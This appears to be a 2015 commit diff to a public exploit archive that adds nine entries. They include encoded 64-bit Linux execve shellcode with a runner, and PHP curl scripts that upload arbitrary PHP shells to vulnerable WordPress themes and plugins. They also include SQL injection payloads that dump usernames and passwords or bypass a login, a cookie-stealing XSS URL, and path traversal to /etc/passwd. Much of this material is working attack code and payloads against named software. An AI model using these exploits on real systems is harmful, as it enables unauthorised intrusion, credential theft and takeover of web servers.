DB: 2015-06-30
9 new exploits
This commit is contained in:
parent
422d274587
commit
7c733046b7
10 changed files with 248 additions and 0 deletions
|
@ -33762,3 +33762,12 @@ id,file,description,date,author,platform,type,port
|
|||
37410,platforms/php/webapps/37410.php,"Joomla! hwdVideoShare Component 'flash_upload.php' Arbitrary File Upload Vulnerability",2012-06-17,"Sammy FORGIT",php,webapps,0
|
||||
37411,platforms/php/webapps/37411.txt,"WordPress Organizer Plugin Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0
|
||||
37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload Vulnerability",2012-06-16,"Sammy FORGIT",php,webapps,0
|
||||
37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component SQL Injection Vulnerability",2012-06-15,"Taurus Omar",php,webapps,0
|
||||
37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 Multiple SQL Injection Vulnerabilities",2012-06-16,JosS,php,webapps,0
|
||||
37415,platforms/php/webapps/37415.txt,"Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0
|
||||
37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
|
||||
37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||
37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||
37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||
37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
|
||||
37427,platforms/linux/shellcode/37427.txt,"encoded 64 bit execve shellcode",2015-06-29,"Bill Borskey",linux,shellcode,0
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/java/webapps/37416.txt
Executable file
9
platforms/java/webapps/37416.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/54049/info
|
||||
|
||||
Squiz CMS is prone to multiple cross-site scripting vulnerabilities and an XML external entity injection vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Attackers may exploit these issues to execute arbitrary code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to perform XML based attacks (including local file disclosure), TCP port scans, and a denial of service (DoS) condition; other attacks are also possible.
|
||||
|
||||
Squiz CMS 4.6.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/_admin/?SQ_BACKEND_PAGE=main&backend_section=am&am_section=edit_asset"><script>alert(document.cookie)</script>&assetid=73&sq_asset_path=%2C1%2C73&sq_link_path=%2C0%2C74&asset_ei_screen=details [XSS]
|
40
platforms/linux/shellcode/37427.txt
Executable file
40
platforms/linux/shellcode/37427.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
/*
|
||||
Compile with: gcc -fno-stack-protector -z execstack
|
||||
This execve shellcode is encoded with 0xff and is for 64 bit linux.
|
||||
|
||||
shell: file format elf64-x86-64
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
0000000000400080 <start>:
|
||||
400080:=0948 b9 ff ff ff ff ff =09movabs rcx,0xffffffffffffffff
|
||||
400087:=09ff ff ff=20
|
||||
40008a:=0949 b8 ae b7 72 c3 db =09movabs r8,0xfffaf0dbc372b7ae
|
||||
400091:=09f0 fa ff=20
|
||||
400094:=0949 31 c8 =09xor r8,rcx
|
||||
400097:=0941 50 =09push r8
|
||||
400099:=0949 b8 d0 9d 96 91 d0 =09movabs r8,0x978cd0d091969dd0
|
||||
4000a0:=09d0 8c 97=20
|
||||
4000a3:=0949 31 c8 =09xor r8,rcx
|
||||
4000a6:=0941 50 =09push r8
|
||||
4000a8:=0949 b8 b7 ce 2d ad 4f =09movabs r8,0x46b7c44fad2dceb7
|
||||
4000af:=09c4 b7 46=20
|
||||
4000b2:=0949 31 c8 =09xor r8,rcx
|
||||
4000b5:=0941 50 =09push r8
|
||||
4000b7:=09ff e4 =09jmp rsp
|
||||
|
||||
2015 William Borskey
|
||||
|
||||
*/
|
||||
char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4";
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
int (*func)();
|
||||
func = (int (*)()) shellcode;
|
||||
(int)(*func)();
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
7
platforms/php/webapps/37413.txt
Executable file
7
platforms/php/webapps/37413.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/54042/info
|
||||
|
||||
The JCal Pro Calendar component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_jcalpro&Itemid=1 [SQL Injection]
|
73
platforms/php/webapps/37414.txt
Executable file
73
platforms/php/webapps/37414.txt
Executable file
|
@ -0,0 +1,73 @@
|
|||
source: http://www.securityfocus.com/bid/54043/info
|
||||
|
||||
Simple Document Management System is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
Simple Document Management System versions 1.1.5 and 2.0 are vulnerable.
|
||||
|
||||
-----------
|
||||
version 2.0
|
||||
-----------
|
||||
|
||||
/list.php?folder_id=['foo]
|
||||
/detail.php?doc_id=['foo]
|
||||
|
||||
<code>
|
||||
line 13: if(isset($_GET['folder_id'])) $folder_id = $_GET['folder_id'];
|
||||
...
|
||||
line 48: if(isset($order)) {
|
||||
$query = "SELECT id,name FROM folders WHERE parent=$folder_id ORDER BY ". rawurldecode($order);
|
||||
} else {
|
||||
$query = "SELECT id,name FROM folders WHERE parent=$folder_id";
|
||||
}
|
||||
</code>
|
||||
|
||||
.xpl! :: /list.php?folder_id=-10+union+all+select+1,1,1,concat_ws(char(58),user,pass,name,email),1,1,1,1,1,1,0+from+users--
|
||||
|
||||
|
||||
~~ [Blind]
|
||||
|
||||
/user_photo.php?view=[foo]
|
||||
|
||||
<code>
|
||||
$query = "SELECT photo,mime FROM users_info WHERE id=".$_GET['view'];
|
||||
$res = mysql_query($query, $sql);
|
||||
if( mysql_num_rows($res) == 1 ) {
|
||||
$row = mysql_fetch_array($res);
|
||||
header( "Content-type: $row[mime]" );
|
||||
echo "". base64_decode($row[photo]) ."";
|
||||
} else {
|
||||
echo "Badness!\n";
|
||||
}
|
||||
</code>
|
||||
|
||||
.poc! :: /user_photo.php?view=2+and+1=1
|
||||
/user_photo.php?view=2+and+1=2
|
||||
|
||||
|
||||
-------------
|
||||
version 1.1.5
|
||||
-------------
|
||||
|
||||
/login.php
|
||||
|
||||
<code>
|
||||
$result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'");
|
||||
$row = @mysql_fetch_array($result);
|
||||
if( $row[0] != 0 ) {
|
||||
header("Location: index.php");
|
||||
exit;
|
||||
}
|
||||
|
||||
$result = @mysql_query("SELECT id,name FROM users WHERE user='$login'");
|
||||
$row = @mysql_fetch_array($result);
|
||||
$id = $row[id];
|
||||
$name = $row[name];
|
||||
</code>
|
||||
|
||||
.xpl! :: user: Admin
|
||||
password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users --
|
||||
|
||||
|
||||
__h0__
|
30
platforms/php/webapps/37415.txt
Executable file
30
platforms/php/webapps/37415.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
source: http://www.securityfocus.com/bid/54045/info
|
||||
|
||||
Multiple Webify products are prone to multiple HTML-injection and local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
|
||||
|
||||
Exploiting these issues could allow an attacker to execute arbitrary HTML and script code in the context of the affected browser, steal cookie-based authentication credentials, and execute arbitrary local scripts in the context of the web server process. Other attacks are also possible.
|
||||
|
||||
The following Webify products are vulnerable:
|
||||
|
||||
Webify eDownloads Cart
|
||||
Webify eDownloads
|
||||
Webify Project Manager
|
||||
Webify Blog
|
||||
|
||||
Local file include:
|
||||
|
||||
http://www.example.com/index.php?page=[LOCAL FILE INCLUDE]
|
||||
|
||||
http://www.example.com/admin/index.php?page=[LOCAL FILE INCLUDE]
|
||||
|
||||
HTML injection:
|
||||
|
||||
http://www.example.com/admin/index.php?page=query [Persistent Script Code Inject via Query Value]
|
||||
|
||||
http://www.example.com/admin/index.php?page=addobjects [Persistent Script Code Inject via addObject name Value]
|
||||
|
||||
http://www.example.com/admin/index.php?page=formdesigner [Persistent Script Code Inject via former label Value]
|
||||
|
||||
http://www.example.com/admin/index.php?page=comments [Persistent Script Code Inject via Comment text & name Value]
|
||||
|
||||
http://www.example.com/admin/index.php?page=submissions [Persistent Script Code Inject via submission name Value]
|
35
platforms/php/webapps/37417.php
Executable file
35
platforms/php/webapps/37417.php
Executable file
|
@ -0,0 +1,35 @@
|
|||
source: http://www.securityfocus.com/bid/54052/info
|
||||
|
||||
Multiple Themes for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
WordPress Famous theme 2.0.5 and WordPress Deep Blue theme 1.9.2 are vulnerable.
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php";
|
||||
|
||||
$ch = curl_init("http://www.example.com/wordpress/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php?folder=/wordpress/wp-content/themes/deep-blue/megaframe/megapanel/inc/&fileext=php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php";
|
||||
|
||||
$ch = curl_init("http://www.example.com/wordpress/wp-content/themes/famous/megaframe/megapanel/inc/upload.php?folder=/wordpress/wp-content/themes/famous/megaframe/megapanel/inc/&;fileext=php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
|
||||
?>
|
29
platforms/php/webapps/37418.php
Executable file
29
platforms/php/webapps/37418.php
Executable file
|
@ -0,0 +1,29 @@
|
|||
source: http://www.securityfocus.com/bid/54057/info
|
||||
|
||||
LB Mixed Slideshow plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
LB Mixed Slideshow 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
PostShell.php
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php.gif";
|
||||
|
||||
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php?element_name=images&gid=1");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, array('images'=>"@$uploadfile"));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Shell Access : http://www.example.com/wordpress/wp-content/plugins/lb-mixed-slideshow/gallery/1/lo.php.gif
|
||||
|
||||
lo.php.gif
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
9
platforms/php/webapps/37419.txt
Executable file
9
platforms/php/webapps/37419.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/54058/info
|
||||
|
||||
Wp-ImageZoom for WordPress is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.
|
||||
|
||||
Wp-ImageZoom 1.0.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/wp-content/plugins/wp-imagezoom/download.php?file=../../../../../../../etc/passwd
|
7
platforms/php/webapps/37420.txt
Executable file
7
platforms/php/webapps/37420.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/54066/info
|
||||
|
||||
VANA CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/general/index.php?recordID=125'
|
Loading…
Add table
Reference in a new issue